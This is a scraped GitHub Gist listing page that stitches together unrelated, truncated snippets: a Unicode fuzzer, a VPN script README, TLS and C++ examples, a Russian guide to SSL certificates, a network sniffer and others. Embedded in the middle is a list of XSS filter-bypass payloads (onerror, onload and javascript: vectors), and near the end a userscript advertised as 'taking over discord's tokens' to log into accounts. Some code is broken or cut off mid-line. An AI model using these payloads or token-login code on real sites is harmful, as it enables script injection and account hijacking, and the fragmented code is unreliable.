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mattcarp /
Created July 24, 2012 22:09
Generates a random length string of non-control Unicode characters
import random
import unicodedata
def unicode_fuzz(lower_limit=0, upper_limit=60):
unicode_glyphs = ''.join(
for char in xrange(65533)
# use the unicode categories that don't include control codes
Lazza /
Last active June 19, 2024 05:52
VPNGate Python script

This script is NOT MAINTAINED

This snippet of code was posted in 2014 and slightly revised in 2016 and 2017. It was more of a quick'n'dirty script than a polished tool. It is made only for Linux and in Python 2, which has since become outdated.

I currently do not use it, and I suggest you avoid it as well. Please do not expect support for using this script.

🔥 If you need an alternative, @glaucocustodio has kindly suggested EasyVPN in this comment.

The rest of the README is left for historical purposed.

saucecode /
Created December 31, 2016 06:50
how to correctly use a letsencrypt cert with flask
from OpenSSL import SSL
context = SSL.Context(SSL.TLSv1_2_METHOD)
Lokno / strings.cpp
Last active August 28, 2022 10:08
Some methods of printing multiline strings in C++
#include <iostream>
#include <string>
using namespace std;
int main()
// you could cascade operators
cout << "+---------+" << endl
<< "| |" << endl
furdarius /
Last active March 13, 2022 19:26
О том как генерировать SSL сертификаты

Криптографические алгоритмы

На сегодняшний день (27 января 2017) в криптографии наиболее широко распространены алгоритмы построенные на базе RSA и Elliptic Curves.

RSA имеет большую популярность, в следствии того, что был изобретен раньше и прост в исполнении. RSA основан на вычислительной сложности задачи факторизации больших целых чисел.

Задачей факторизации люди занимаются уже множество десятилетий, а вот субэкспоненциальных алгоритмов решения задачи дискретного логарифмирования на сегодняшний день не известно.

Implements a simple HTTP/1.0 Server
import socket
def handle_request(request):
"""Handles the HTTP request."""
takuzoo3868 /
Last active December 11, 2023 07:32
Shell script for determining Linux distribution
# Linux(Distribution) MacOS SunOS AIX に対応
OS=`uname -s`
REV=`uname -r`
MACH=`uname -m`
GetVersionFromFile() {
VERSION="$(tr "\n" ' ' < cat "$1" | sed s/.*VERSION.*=\ // )"
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
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<![><img src="]><img src=x onerror=javascript:alert(1)//">
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<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
import EventEmitter from 'events'
import pcap from 'pcap'
import pcapFilters from './pcap-filters'
import tlsClientHello from 'is-tls-client-hello'
import sni from 'sni'
class Sniffer extends EventEmitter {
constructor (logDebug = false) {
m-Phoenix852 / index.user.js
Last active June 13, 2024 17:16
Userscript to login to discord accounts with ease, just do SHIFT + T at the login page and enter the token!
// ==UserScript==
// @name Discord Token Login
// @namespace
// @version 1.1
// @description Taking over discord's tokens!
// @author Phoenix852
// @match *://
// @updateURL
// @grant none
// @iconURL